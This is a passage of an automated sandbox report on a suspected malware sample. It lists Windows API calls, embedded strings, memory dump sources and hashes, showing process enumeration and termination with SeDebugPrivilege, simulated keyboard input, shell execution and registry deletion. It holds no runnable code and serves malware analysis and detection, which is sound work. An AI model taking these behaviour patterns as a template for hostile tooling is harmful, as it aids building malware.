                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 8411c1702460a5fd27c46179eefb356a927f484e44639f3b9b7edca84201a759
                                    • Instruction ID: 13b0d09c3f6c6b11cc8b2c11854bd73c8283638a258bc02efd8fc60abf7bbfbd
                                    • Opcode Fuzzy Hash: 8411c1702460a5fd27c46179eefb356a927f484e44639f3b9b7edca84201a759
                                    • Instruction Fuzzy Hash: 8C11E171A50618BFF6106B60DC8EFAA3B2DEB4C752F100525F744AB0A1CAF25C14EBA4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E0C
                                    • RtlAllocateHeap.NTDLL(00000000,?,00F58A84), ref: 00F58E13
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F58A84,00000B00,?,?), ref: 00F58E28
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E30
                                    • DuplicateHandle.KERNEL32(00000000,?,00F58A84,00000B00,?,?), ref: 00F58E33
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F58A84,00000B00,?,?), ref: 00F58E43
                                    • GetCurrentProcess.KERNEL32(00F58A84,00000000,?,00F58A84,00000B00,?,?), ref: 00F58E4B
                                    • DuplicateHandle.KERNEL32(00000000,?,00F58A84,00000B00,?,?), ref: 00F58E4E
                                    • CreateThread.KERNEL32(00000000,00000000,00F58E74,00000000,00000000,00000000), ref: 00F58E68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                    • String ID:
                                    • API String ID: 1422014791-0
                                    • Opcode ID: 7ca7d05d4d22fc8bea376edadeb1241799eb5db014fbc32bbf7cfea6bbfd6e20
                                    • Instruction ID: f9a6f148bed2905d903fd033020a2b0afa1fc84a8086ef2df685d13fed8bfda3
                                    • Opcode Fuzzy Hash: 7ca7d05d4d22fc8bea376edadeb1241799eb5db014fbc32bbf7cfea6bbfd6e20
                                    • Instruction Fuzzy Hash: 7501BBB5240748FFE710ABA5DC8DFAB3BACEB89711F004421FA05DB1A1CA749814DB20
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: 257b0f11ac5ea23babf4cab8675061c0de73b6f774525fd0fa87e33946f9d7d8
                                    • Instruction ID: 47ac01d6f93c8a4337f8f692b7b8b6ac5d50f1f8c054c733ed232d908b2b16de
                                    • Opcode Fuzzy Hash: 257b0f11ac5ea23babf4cab8675061c0de73b6f774525fd0fa87e33946f9d7d8
                                    • Instruction Fuzzy Hash: 10919D71E04219ABDF20DFA5CC44FAEBBB8EF45724F10C15AE519AB280D7B09905DFA1
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F87093
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F870A7
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F870C1
                                    • _wcscat.LIBCMT ref: 00F8711C
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F87133
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F87161
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 4c87e96b472e4cc91d64dd8efbc92224e025daecdbff6cc5394c1655edc189e1
                                    • Instruction ID: b8488df2bf976a49080ae6753cea4fe870ec19341f489c0138f4dc976b2a0687
                                    • Opcode Fuzzy Hash: 4c87e96b472e4cc91d64dd8efbc92224e025daecdbff6cc5394c1655edc189e1
                                    • Instruction Fuzzy Hash: 64419371A04308AFDB21EF64CC85BEEB7A8EF08360F20056AF544E7192D775DD85AB60
                                    APIs
                                      • Part of subcall function 00F63E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00F63EB6
                                      • Part of subcall function 00F63E91: Process32FirstW.KERNEL32(00000000,?), ref: 00F63EC4
                                      • Part of subcall function 00F63E91: CloseHandle.KERNEL32(00000000), ref: 00F63F8E
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7ECB8
                                    • GetLastError.KERNEL32 ref: 00F7ECCB
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7ECFA
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F7ED77
                                    • GetLastError.KERNEL32(00000000), ref: 00F7ED82
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7EDB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: 36c03724c9da79dc2b705b2da6788ed1d93053102a435949132754914c11b997
                                    • Instruction ID: 7af2405bbfd3d744b6368abaaf06a7af929ead7aa2f7e89e4323e8b19b1c813e
                                    • Opcode Fuzzy Hash: 36c03724c9da79dc2b705b2da6788ed1d93053102a435949132754914c11b997
                                    • Instruction Fuzzy Hash: F741C3717042009FDB24EF14CC95FBDB7A5AF44714F18805AF9469F2C2DBB9A809EB92
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F632C5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: d5f5fe9d9a06a4374d4390c6678e7ab7aeaf7b5dd182ef7a682b048995177bab
                                    • Instruction ID: 09ed37591809edc2c613161dbeb89cc6a65341e22cd9b969867be447f7866a03
                                    • Opcode Fuzzy Hash: d5f5fe9d9a06a4374d4390c6678e7ab7aeaf7b5dd182ef7a682b048995177bab
                                    • Instruction Fuzzy Hash: 0E11DD32A483567BE7015B55EC63DABB7ACDF19770F20002AF500961C1D6799B407AA5
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00F78BEC
                                    • CoInitialize.OLE32(00000000), ref: 00F78C19
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F78D23
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F78E50
                                    • CoGetObject.OLE32(?,00000000,00F92C0C,?), ref: 00F78EA7
                                    • SetErrorMode.KERNEL32(00000000), ref: 00F78EBA
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F78F3A
                                    • VariantClear.OLEAUT32(?), ref: 00F78F4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
                                    • String ID:
                                    • API String ID: 2437601815-0
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6454E
                                    • LoadStringW.USER32(00000000), ref: 00F64555
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6456B
                                    • LoadStringW.USER32(00000000), ref: 00F64572
                                    • _wprintf.LIBCMT ref: 00F64598
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F645B6
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F64593
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F02ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000,000000FF), ref: 00F02B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F3C46A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00F3C417,00000004,00000000,00000000,00000000), ref: 00F3C4D6
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F6737F
                                      • Part of subcall function 00F20FF6: std::exception::exception.LIBCMT ref: 00F2102C
                                      • Part of subcall function 00F20FF6: __CxxThrowException@8.LIBCMT ref: 00F21041
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F673B6
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00F673D2
                                    • _memmove.LIBCMT ref: 00F67420
                                    • _memmove.LIBCMT ref: 00F6743D
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00F6744C
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F67461
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F67480
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00F8645A
                                    • GetDC.USER32(00000000), ref: 00F86462
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F8646D
                                    • ReleaseDC.USER32(00000000,00000000), ref: 00F86479
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F864B5
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F864C6
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F89299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F86500
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F86520
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CoInitialize.OLE32(00000000), ref: 00F6D855
                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F6D8E8
                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F6D8FC
                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F6D9B7
                                    • _memset.LIBCMT ref: 00F6DA4C
                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F6DA88
                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F6DAAB
                                    Similarity
                                    • API ID: Folder$BrowseCreateDesktopFromInitializeItemListLocationPathShellSpecial__itow__swprintf_memset
                                    • String ID:
                                    • API String ID: 3008154123-0
                                    APIs
                                    • IsWindow.USER32(01983AE0), ref: 00F8B6A5
                                    • IsWindowEnabled.USER32(01983AE0), ref: 00F8B6B1
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F8B795
                                    • SendMessageW.USER32(01983AE0,000000B0,?,?), ref: 00F8B7CC
                                    • IsDlgButtonChecked.USER32(?,?), ref: 00F8B809
                                    • GetWindowLongW.USER32(01983AE0,000000EC), ref: 00F8B82B
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F8B843
                                    Similarity
                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                    • String ID:
                                    • API String ID: 4072528602-0
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CoInitialize.OLE32 ref: 00F78718
                                    • VariantInit.OLEAUT32(?), ref: 00F78890
                                    • VariantClear.OLEAUT32(?), ref: 00F788F1
                                    Similarity
                                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 4106155388-1287834457
                                    APIs
                                    • _memset.LIBCMT ref: 00F7F75C
                                    • _memset.LIBCMT ref: 00F7F825
                                    • ShellExecuteExW.SHELL32(?), ref: 00F7F86A
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • GetProcessId.KERNEL32(00000000), ref: 00F7F8E1
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7F910
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    APIs
                                    • GetParent.USER32(?), ref: 00F6149C
                                    • GetKeyboardState.USER32(?), ref: 00F614B1
                                    • SetKeyboardState.USER32(?), ref: 00F61512
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F61540
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6155F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F615A5
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F615C8
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
                                    • Instruction ID: 02e7600ca64089052156b42ab2784914ce82ba3f2686415b2ed4b107befa8f54
                                    • Opcode Fuzzy Hash: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
                                    • Instruction Fuzzy Hash: 8A51E3A0E047D53EFB328634CC45BBABEA97B46324F0C8589E1D6468D2C799DC94F750
                                    APIs
                                    • GetParent.USER32(00000000), ref: 00F612B5
                                    • GetKeyboardState.USER32(?), ref: 00F612CA
                                    • SetKeyboardState.USER32(?), ref: 00F6132B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F61357
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F61374
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F613B8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F613D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
                                    • Instruction ID: 477fdc9e8f1a6ca4aa7ff932ac1adf06a93c046fedf1048c14ade0ad7a3d2642
                                    • Opcode Fuzzy Hash: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
                                    • Instruction Fuzzy Hash: 5851F6A0D047D53DFB3287248C56BBA7FA9BB06310F0C8689E1D5869C2D795AC98F750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 49e12d2f186eb2c8e877ebd086fe32b501f2b7e3b415995f7d365b708eb036c8
                                    • Instruction ID: 78865d8bb7fab717c9384d2eb0822ed4ae32e00e74828bf5f2691d55842c4630
                                    • Opcode Fuzzy Hash: 49e12d2f186eb2c8e877ebd086fe32b501f2b7e3b415995f7d365b708eb036c8
                                    • Instruction Fuzzy Hash: 8F41B2A5C20528B6CF50EBF49C869CFB3A8AF05710F508856F518E3121E63CE754E7A5
                                    APIs
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F638D3,?), ref: 00F648C7
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F638D3,?), ref: 00F648E0
                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F638F3
                                    • _wcscmp.LIBCMT ref: 00F6390F
                                    • MoveFileW.KERNEL32(?,?), ref: 00F63927
                                    • _wcscat.LIBCMT ref: 00F6396F
                                    • SHFileOperationW.SHELL32(?), ref: 00F639DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    • Opcode ID: a1f2d87a6c6d72b64a4c02c7ae01bc6ff21a4adb64a6076accb38c622cf2e185
                                    • Instruction ID: e9b3d21d7225c5e356f949e3cc0ddd099686deda967146c13ffba31af0f3815d
                                    • Opcode Fuzzy Hash: a1f2d87a6c6d72b64a4c02c7ae01bc6ff21a4adb64a6076accb38c622cf2e185
                                    • Instruction Fuzzy Hash: 734191B250D3449ED751EF64D881AEFB7E8AF88350F00092EB489C3151EA79D688EB52
                                    APIs
                                    • _memset.LIBCMT ref: 00F87519
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F875C0
                                    • IsMenu.USER32(?), ref: 00F875D8
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F87620
                                    • DrawMenuBar.USER32 ref: 00F87633
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    • Opcode ID: e3e4d0c78bde6782005ccd6de852f17e15870114c0e984e0ca1d1bcad04ca439
                                    • Instruction ID: 3b158dad2cdea34ee08bef03b2da5e8f443d38ef6049021cd8116c11c203cad5
                                    • Opcode Fuzzy Hash: e3e4d0c78bde6782005ccd6de852f17e15870114c0e984e0ca1d1bcad04ca439
                                    • Instruction Fuzzy Hash: 6B410875A08709AFDB10EF54D984EEABBB8FF04324F148129E9559B290D730ED54EFA0
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F8125C
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F81286
                                    • FreeLibrary.KERNEL32(00000000), ref: 00F8133D
                                      • Part of subcall function 00F8122D: RegCloseKey.ADVAPI32(?), ref: 00F812A3
                                      • Part of subcall function 00F8122D: FreeLibrary.KERNEL32(?), ref: 00F812F5
                                      • Part of subcall function 00F8122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F81318
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F812E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    • Opcode ID: 637f25b946fa58255a0a225dbf20dc87623b7ca522c77082cb066c364ef4cc79
